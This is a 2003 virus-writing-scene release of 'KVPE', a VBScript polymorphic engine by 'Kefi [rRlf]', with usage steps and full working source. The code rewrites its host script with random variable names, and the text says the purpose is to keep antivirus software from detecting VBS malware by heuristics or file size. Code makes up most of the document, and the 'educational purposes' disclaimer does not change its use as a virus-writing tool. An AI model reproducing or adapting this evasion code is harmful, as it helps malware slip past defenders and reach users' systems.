Kefi's VBS Polymorphic Engine v0.1 [KVPE] January 24, 2003 Kefi.[rRlf] - How to use KVPE: 1. Make a list of every variable in your VBS file 2. Add it them at the line given 3. Add the following code to the bottom of your VBS file - Significance: This script will replace your variables with a randomly created string with a random length. By doing this Anti-Viruses will not be able to pick them up with heuristic scanning, or by the file's size. - Disclaimer: This code is for educational purposes only. I will not be held responsible for your actions with this script. If you are to use this script in your VBS file you MUST contact me first. I do not want this method spread. - Note: On run this file will create new varibles in your file, which will be hard to work with, I sujest not running the file until it is finished. - Contact Me: e-Mail - HTTP - VX Group - '---------------- KVPE Code Starts ---------------- randomize set fso=createobject("scripting.filesystemobject") set vbsfile=fso.opentextfile(wscript.scriptfullname,1,false) code=vbsfile.readall vars=array("code","vars","var","newlet","num","newlet","fso","vbsfile") '<--- Add all of your varibles here, but do not take any of the ones already in out because if you do the script will not work. for each var in vars for num=1 to int(rnd*14) + 2 if int(rnd*2)+1=1 then newlet=newlet& ucase(chr((int(rnd*22)+97))) if int(rnd*2)+1=1 then newlet=newlet & int(rnd*int(rnd*4)) end if else newlet=newlet&lcase(chr((int(rnd*22)+97))) if int(rnd*2)+1=1 then newlet=newlet&int(rnd *2) else newlet=newlet&int(rnd*int(rnd*6)) end if end if next code=replace(code,var,newlet) newlet="" next set vbsfile=fso.opentextfile(wscript.scriptfullname,2,false) vbsfile.write code '---------------- KVPE Code Stops ---------------- A newer version may be expected in the future, goto for updates. Regards, Kefi.[rRlf]